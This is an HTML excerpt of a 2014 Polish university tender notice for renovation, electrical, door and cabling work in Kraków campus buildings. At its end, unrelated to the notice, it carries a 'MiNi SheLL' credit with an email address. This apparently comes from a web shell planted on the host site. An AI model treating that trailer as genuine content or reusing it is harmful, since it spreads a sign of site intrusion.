<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego pokój nr 110, budynek W-9, ul. Warszawska 24, 31-155 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 08:30, miejsce: w siedzibie Zamawiającego pokój nr 110, budynek W-9, ul. Warszawska 24, 31-155 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont pomieszczenia w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki  Politechniki Krakowskiej ul. Podchorążych 1    w Krakowie  w zakresie wymiany instalacji elektrycznej i oświetlenia w sali  F 101.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont pomieszczenia w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki  Politechniki Krakowskiej ul. Podchorążych 1    w Krakowie  w zakresie wymiany instalacji elektrycznej i oświetlenia w sali  F 101 

Opis:  wymiana instalacji elektrycznej i oświetlenia w sali  F 101  obejmująca :
-  demontaż istniejących elementów instalacji elektrycznej 
-  wykonanie rozbiórek istniejącej boazerii 
-  wykonanie nowej tablicy rozdzielczej wraz z zasilaniem
-  wykonanie nowej instalacji światła i siły 
-  montaż nowych opraw oświetleniowych  
-  wykonanie  instalacji słaboprądowych (nagłośnienie, sieć strukturalna, sterowanie systemem   rolet, okablowaniem dla systemu SAP) zasilanie urządzeń multimedialnych wykonać na osobnych zabezpieczeniach/
-  wykonanie nowej katedry wraz z wyposażeniem 
-  wymiana drzwi /drzwi drewniane z ościeżnicą okleina naturalna,   przylgowe pełne, zamek   antypaniczny z okuciem klamka - klamka, 
-  montaż żaluzji okiennych z napędem elektrycznym  wraz z doprowadzeniem zasilania 
-  wykonanie sufitu  podwieszonego  o konstrukcji metalowej z wypełnieniem płytami z włókien   mineralnych 
-  malowanie ścian i sufitów
-  renowacja posadzki 
Minimalny wymagany okres gwarancji i rękojmi na montaż i instalacje    3 lata,  na urządzenia  gwarancja producenta , licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.
Termin wykonania zamówienia:  do 45 dni od daty przekazania placu budowy . Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont pomieszczenia w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1 w Krakowie  w zakresie  wymiany oświetlenia w pom.  F201.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont pomieszczenia w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1 w Krakowie  w zakresie  wymiany oświetlenia w pom.  F201 
Opis:  Wymiana oświetlenia w pom.  F201 obejmująca :
- wymianę  opraw  oświetleniowych 
- wykonanie nowej instalacji światła
- wykonanie pomiarów 

Minimalny wymagany okres gwarancji i rękojmi na montaż i instalacje  
3 lata,  na urządzenia  gwarancja producenta , licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.

Termin wykonania zamówienia:  do 45 dni od daty przekazania placu budowy. Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont pomieszczeń w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont pomieszczeń w budynku 11-1 Wydziału Fizyki Matematyki i Informatyki Politechniki Krakowskiej ul. Podchorążych 1 w Krakowie
 Opis: Wymiana  drzwi do bocznych korytarzy I i II pietra strona zachodnia oraz do pomieszczeń F111, F112, F206/207 , WC I p w zakresie :
- demontaż istniejących drzwi
- dostawa i montaż nowych drzwi w PT 
- wykonanie  okładziny ościeży- szpalet /wg opisu PT/ - drewno twarde liściaste drzwi typ 2 i 3 /   
- dostawa i montaż okuć antypanicznych w drzwiach typu D1 i D2 
- wykonanie drobnych prac budowlanych / rozbiórki ścian, nadproża , zamurowania otworów  uzupełnienia tynków, malowanie, naprawa posadzki / po osadzeniu drzwi 
Minimalny wymagany okres gwarancji i rękojmi na wykonane   roboty budowlane  3 lata,  na stolarkę 7 lat, licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.
Termin wykonania zamówienia:  do 45 dni od daty przekazania placu budowy. Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przebudowa instalacji słaboprądowych (bez części elektrycznej w sieci) w budynku 10-29 Wydziału Inżynierii Lądowej - L1 Politechniki Krakowskiej, ul. Warszawska 24 w Krakowie, w ramach zadania inwestycyjnego: Przebudowa instalacji okablowania strukturalnego w bud. 10-29, WIL, ul. Warszawska 24 Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa instalacji słaboprądowych (bez części elektrycznej w sieci) w budynku 10-29 Wydziału Inżynierii Lądowej - L1 Politechniki Krakowskiej, ul. Warszawska 24 w Krakowie, w ramach zadania inwestycyjnego: Przebudowa instalacji okablowania strukturalnego w bud. 10-29, WIL, ul. Warszawska 24 Kraków- Zadanie nr 4 
Opis: Przebudowa instalacji słaboprądowych (bez części elektrycznej w sieci) w budynku 10-29 Wydziału Inżynierii Lądowej - L1 Politechniki Krakowskiej, ul. Warszawska 24 w Krakowie w zakresie :
- tras kablowych oraz gniazd sieciowych
- szaf dystrybucyjnych oraz z wyposażeniem
- instalacji zasilania gniazd wtykowych dedykowanych w szafach
- robót budowlanych towarzyszących, demontaży, wywozy
Minimalny wymagany okres gwarancji i rękojmi na wykonane   roboty budowlane  3 lata,  na zamontowane urządzenia  gwarancja producenta , licząc od daty końcowego odbioru robót. 
Czas reakcji serwisu do  24 godzin. Wykonawca winien wadę lub usterkę usunąć w terminie  wyznaczonym przez Zamawiającego.
Wykonawca winien zapewnić nieodpłatny autoryzowany serwis zgodnie z warunkami gwarancji producenta urządzeń i wykonywać nieodpłatnie i własnym staraniem wszelkie przeglądy serwisowe wymagane przez producentów zainstalowanych urządzeń
Termin wykonania zamówienia: do 15 października 2014 roku. Za termin zakończenia przedmiotu umowy uważa się datę podpisania protokołu odbioru końcowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com